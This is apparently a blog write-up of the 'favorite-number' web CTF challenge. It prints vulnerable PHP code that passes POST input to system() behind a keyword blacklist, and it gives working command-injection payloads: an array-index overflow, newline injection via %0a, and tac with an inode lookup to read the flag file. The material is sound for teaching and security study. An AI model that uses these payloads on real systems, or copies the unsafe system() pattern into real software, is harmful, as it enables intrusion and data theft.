攻防世界: web favorite-number

题目剖析

这是一道PHP代码审计题目

<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

通过代码审计,可以观察到以下信息:

  • PHP版本5.5.9
  • 存在数组强类型比较
  • 存在过滤num的POST注入
    • ^和$ 匹配字符串开头和结尾
    • /d 匹配数字
    • /i 表示匹配的时候不区分大小写
    • /m 表示多行匹配。所以我们可以得出,在进行POST注入num的时候,需要首位一定是数字,并且要绕过多行匹配
  • 黑名单机制

漏洞分析

  • PHP版本5.5存在数组溢出漏洞
    即如果是32位的操作处理,那么数组最大值是232-1=4294967295=1111 1111 1111 1111 1111 1111 1111 1111。如果加1,那么就会变成1 0000 0000 0000 0000 0000 0000 0000 0000,因为是32位,只保留后32位,前面的1将被舍弃,数组重新归零。
    所以按照此题目的 stuff[4294967295]=stuff[0]
    那么就可以重新进行post注入,按照这个强类型比较又要求$stuff[0] != 'admin'
    可以书写payload:stuff[4294967296]=admin&stuff[1]=user
    这样可以绕过第一个if判断
  • num的换行匹配漏洞
    普通换行无法达成命令的注入,可以用%0a进行替代
  • 黑名单机制漏洞
    使用黑名单最大的坏处就是黑名单不全
    可以使用tac实现和cat效果完全相反的反向读取
    可以使用iNode节点读取flag文件

注入payload

所以我们可以分别注入payload为:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als
!image
stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i /image
stuff[4294967296]=admin&stuff[1]=user&num=123%0atac find / -inum 33043719image

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值